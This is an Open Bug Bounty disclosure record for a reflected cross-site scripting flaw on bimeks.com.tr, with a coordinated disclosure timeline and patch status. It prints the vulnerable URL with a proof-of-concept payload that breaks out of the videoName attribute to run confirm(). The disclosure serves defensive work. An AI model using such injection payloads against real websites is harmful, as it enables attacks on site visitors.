bimeks.com.tr XSS vulnerability

2016-04-21T05:23:00
ID OBB:147671
Type openbugbounty
Reporter tbm
Modified 2016-07-14T18:24:00

Description

Vulnerable URL:
http://www.bimeks.com.tr/videolar.aspx?videoName=apple-iphone" onload=confirm(/XSSPOSED/) rest="-5s-incelemesi&videoID;=78&VideoTip;=1103&as;=video
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 9906
VIP website status:| Yes
Check bimeks.com.tr SSL connection:| (Grade: C+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 21 April, 2016 05:23 GMT
Generic security notifications sent to website owner| 21 April, 2016 05:25 GMT
Customized security notification sent to website owner| 21 April, 2016 05:25 GMT
Notification sent to subscribers (without technical details)| 21 April, 2016 06:17 GMT
Vulnerability details disclosed by researcher| 14 July, 2016 06:11 GMT
Vulnerability patched by the website owner| 14 July, 2016 18:24 GMT